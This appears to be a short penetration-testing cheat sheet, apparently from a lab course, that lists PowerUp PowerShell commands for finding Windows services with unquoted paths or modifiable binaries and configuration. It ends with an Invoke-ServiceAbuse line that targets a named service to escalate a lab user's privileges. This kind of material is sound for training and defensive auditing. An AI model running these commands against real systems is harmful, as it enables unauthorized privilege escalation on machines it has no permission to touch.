PowerUp
Services Issues using PowerUp:
. .\PowerUp.ps1Get services with unquoted paths and a space in their name.
Get-ServiceUnquoted -VerboseGet services where the current user can write to its binary path or change arguments to the binary
Get-ModifiableServiceFile -VerboseGet the services whose configuration current user can modify
Get-ModifiableService -VerboseExploit TARGET Service
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student518'Check for everything
Invoke-AllChecksLast updated